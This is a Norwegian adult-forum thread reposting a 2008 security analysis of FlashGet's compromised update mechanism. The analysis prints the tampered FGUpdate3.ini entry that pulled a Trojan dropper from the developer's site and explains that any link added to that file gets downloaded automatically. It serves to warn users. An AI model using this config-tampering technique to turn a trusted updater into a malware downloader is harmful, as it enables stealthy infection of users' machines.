Nakenprat med pornofilmer, sexleketøy, sexbilder , erotisk chat , norsk porno og erotikk
Viser resultatene 1 til 2 av 2
  1. #1
    Medlem siden
    Jul 2005
    Innlegg
    3,387
    Fylke
    Kjønn

    Heads up For Brukere som kjører Flashget.

    TrojanGet infects users around the world
    March 14, 2008

    A few days ago we started getting messages from users saying that their antivirus software had started detecting Trojans in the Flashget directory

    Image
    http://i31.ti*ny*pic.com/2v1l0qs.jpg

    Analysis showed that the problem was affecting Flashget users all over the world. Files called inapp4.exe, inapp5.exe, and inapp6.exe (which are detected by Kaspersky Anti-Virus as Trojan-Dropper.Win32.Agent.exo, Dropper.Win32.Agent.ezxo, and Trojan-Dowloader.Win32.Agent.kht) appeared on the victim machines.

    The strangest thing was the fact that no other Trojans were detected that could have been used for the files shown above to get onto the system. Some affected users had fully patched operating systems and browsers. So how did the malicious programs penetrate their computers?

    The first thing that was noticed was the location of the Trojans – the FlashGet directory. Taking a closer look, it became clear that in addition to the Trojans, the date the FGUpdate3.ini file had been created/modified was very recent (the difference from the original file is highlighted in blue):


    [Add]
    fgres1.ini=1.0.0.1035
    FlashGet_LOGO.gif=1.0.0.1020
    inapp4.exe=1.0.0.1031
    [AddEx]
    [fgres1.ini]
    url=h__p://dl.flashget.com/flashget/fgres1.cab
    flag=16
    path=%product%
    [FlashGet_LOGO.gif]
    url=h__p://dl.flashget.com/flashget/FlashGet_LOGO.cab
    flag=16
    path=%product%

    [inapp4.exe]
    url=h__p://dl.flashget.com/flashget/appA.cab
    flag=2
    path=%product%

    Image
    http://i27.ti*ny*pic.com/i20x37.png

    Strangely enough, the link to inapp4.exe (a Trojan file) leads to the FlashGet site, which is where the Trojan was downloaded from as appA.cab.

    The FlashGet site didn't have any information about the incident, but the users’ forum was full of messages on the topic, even though the developers hadn’t said anything about it.

    According to information we managed to find on the web, the first infection was detected on 29 February. The last case we know of occurred on 9 March. For 10 days a perfectly legitimate program acted as a Trojan-Downloader, installing and launching Trojans from the developer’s site onto users’ computers!

    The Trojans have now been removed from the site, and FGUpdate3.ini (which also downloads to the user's machine via the Internet) is in its original condition.

    So how was FlashGet turned into a Trojan-Downloader? There's one obvious answer – the developer’s site was hacked and someone managed to substitute the standard configuration file and link it to a Trojan located on the site. Why the hacker didn't use a different site isn't clear. Maybe this was deliberate stealthing, as a link to FlashGet in the configuration file isn't likely to arouse suspicion). We decided to check whether it would be possible to use this technique to download any file from any site. The answer? Yes, it is.

    All you need to do is add a link (which can point to any file you want) to the FGUpdate3.ini file and it will be automatically downloaded to your computer every time you launch FlashGet. Even if you don’t press “Refresh”, FlashGet uses the information from the .ini file. This “vulnerability” is present in all versions of FlashGet 1.9.xx.

    So, in spite of the fact that the site is no longer “hacked”, users are still vulnerable. Any Trojan program could modify the local .ini FlashGet file, causing it to function like a Trojan-Downloader. And it's worth noting here that FlashGet is usually treated as a trusted application, consequently, network activity caused by the application or requests to sites won't be flagged as suspicious, and users won't be alerted.


    There has, as yet, been no official reaction from the Chinese developers of FlashGet. The reason for the incident remains unclear and there is no guarantee that it will not happen again. Users should feel free to draw their own conclusions… and take whatever measures they feel to be appropriate.

    (Fjern * i bilde link, de andre linkene er ikke noe å bry seg med! sens*r..grr)
    Nyttige / viktige linker for brukere på nakenprat.com
    Spesifikke regler for Opplastning av Film
    Regler og informasjon!
    Hvordan laste opp bilder
    Vil du ha en avatar på forumet?
    Ofte spurte spørsmål

    "∂α∂∂у, ωну ∂σєšи'т тнιš
    мαğиєт ρι¢к υρ тнιš ƒℓσρρу ∂ιšк؟"

  2. #2
    Medlem siden
    Sep 2006
    Innlegg
    998
    Fylke
    Kjønn
    Vet ikke om det var dette jeg hørte på tv`en her om dagen... Det var i hvertfall noe om ett stort utbrudd. Fikk ikke hørt alt for den jævla hunden bjeffer alltid når jeg skal se på noe interresant^^... Takk for infoen Lilith


Trådinformasjon

Users Browsing this Thread

Det er for øyeblikket 1 brukere som leser denne tråden. (0 medlemmer og 1 gjester)

Lignende Tråder

  1. heads up nu som det nermer seg sommer og varmere tider
    Av jack reacher i forumet Generell prat
    Svar: 0
    Nyeste innlegg: 20-04-13, 16:43
  2. For de som har sett LOST
    Av sveno2k i forumet Humor og moro
    Svar: 2
    Nyeste innlegg: 16-09-06, 23:18
  3. En side for oss som liker Private P-filmer.
    Av Oslomann51 i forumet Utenlandsk erotikk
    Svar: 0
    Nyeste innlegg: 24-07-06, 12:22
  4. for dem som liker jentekos. link
    Av surface i forumet Utenlandsk erotikk
    Svar: 17
    Nyeste innlegg: 03-03-06, 14:28

Regler for innlegg

  • Du kan ikke starte nye tråder
  • Du kan ikke svare på innlegg / tråder
  • Du kan ikke laste opp vedlegg
  • Du kan ikke redigere innleggene dine
  •  
kripos